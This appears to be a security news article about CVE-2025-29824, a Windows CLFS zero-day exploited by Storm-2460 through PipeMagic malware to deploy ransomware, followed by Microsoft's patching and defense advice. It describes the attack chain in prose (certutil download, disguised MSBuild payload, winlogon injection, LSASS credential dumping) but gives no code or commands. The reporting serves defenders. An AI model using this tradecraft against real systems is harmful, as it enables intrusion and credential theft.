In an alarming revelation, Microsoft’s Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) have identified a significant security vulnerability in the Windows Common Log File System (CLFS). The vulnerability, tracked as CVE-2025-29824, has already been exploited in real-world attacks, notably by the Storm-2460 cybercrime group. This zero-day flaw in the CLFS kernel driver allows attackers to escalate their privileges on compromised systems, potentially paving the way for large-scale ransomware attacks.
Discovered in April 2025, the exploitation of this vulnerability has targeted various sectors, including IT, real estate, finance, and retail, with organizations across the United States, Venezuela, Spain, and Saudi Arabia affected. As of April 8, 2025, Microsoft has released critical security updates to mitigate the risk posed by this zero-day vulnerability, but experts are urging immediate patching to prevent further exploitation.
At its core, CVE-2025-29824 is a privilege escalation flaw. It allows an attacker with standard user privileges to gain administrator-level access on a compromised system, granting them nearly unlimited control over the target device. The exploit works by leveraging the CLFS kernel driver, which handles log file management for Windows systems.
Once successful, the attacker can deploy additional malicious payloads, including ransomware, across the network. Microsoft traced the exploit’s deployment to PipeMagic malware, a tool that the Storm-2460 group is using to infiltrate systems and carry out cyberattacks. Notably, the PipeMagic malware was also previously linked to another zero-day exploit related to a Win32k vulnerability (CVE-2025-24983).
The attack chain begins with Storm-2460 exploiting legitimate tools to deliver malicious payloads. Using the Windows certutil utility, the threat actors download a file from a compromised third-party website. This file, disguised as a benign MSBuild file, contains an encrypted malware payload. Once executed, the malware is decrypted and activated via the EnumCalendarInfoA API callback, eventually revealing itself as PipeMagic malware.
The PipeMagic malware then installs the zero-day exploit and enables the attacker to elevate privileges within the compromised environment. A key observation here is the use of the NtQuerySystemInformation API to leak kernel addresses to user mode, which is instrumental in carrying out the exploitation process.
Once the exploit has been successfully deployed, the attacker gains full control over the system. At this stage, they inject a malicious payload into the winlogon.exe process, facilitating the execution of further commands that dump sensitive data, such as user credentials, from the compromised system’s LSASS memory.
This ultimately leads to the deployment of ransomware, with files being encrypted and marked with random extensions. The ransomware also drops a ransom note, named !READ_ME_REXX2!.txt, which provides instructions for the victim on how to pay the ransom. While the exact ransomware variant remains unidentified, two .onion domains found in the ransom notes are linked to the notorious RansomEXX ransomware family.
To address the threat, Microsoft released patches for CVE-2025-29824, which should be applied immediately by all affected organizations. Notably, Windows 11, version 24H2, is not vulnerable to this exploit due to changes in how system information is accessed.
Microsoft is urging customers to implement additional security measures to protect against ransomware attacks. Some of the most critical steps include:
Enabling cloud-delivered protection in Microsoft Defender Antivirus or any other equivalent antivirus product to defend against rapidly evolving threats.
Onboarding unmanaged devices to Microsoft Defender for Endpoint to ensure full visibility into the network and reduce attack surfaces.
Running EDR in block mode to prevent malicious artifacts from infiltrating the system and enabling immediate remediation if any breach occurs.
Using Microsoft 365 Defender to apply advanced attack surface reduction rules and prevent common ransomware techniques.
To further bolster defenses, Microsoft suggests turning on advanced protection capabilities such as Microsoft Defender XDR, which integrates endpoint detection and response with other security tools for a more comprehensive approach. Security Copilot, available through Microsoft Defender, offers an added layer of protection by automating investigations and incident response tasks.
Additionally, customers can utilize Microsoft Sentinel to track malicious activity and use threat intelligence for faster detection and response. For those seeking a more granular level of control, Sentinel’s TI Mapping analytics can help correlate malicious domains, such as those associated with PipeMagic and RansomEXX, with data in their workspace.
As this exploit continues to unfold, organizations must prioritize patching and deploying the necessary defenses to avoid falling victim to ransomware attacks. With cybercriminals becoming more sophisticated in their methods, it is essential for businesses to stay ahead of the curve by following Microsoft’s guidance and applying the latest security updates.
For those seeking more detailed information on the attack, indicators of compromise, and detection methods, Microsoft has provided a comprehensive set of resources. These include hunting queries for Microsoft Sentinel and indicators like the CLFS BLF file path and suspicious command lines related to ransomware activity.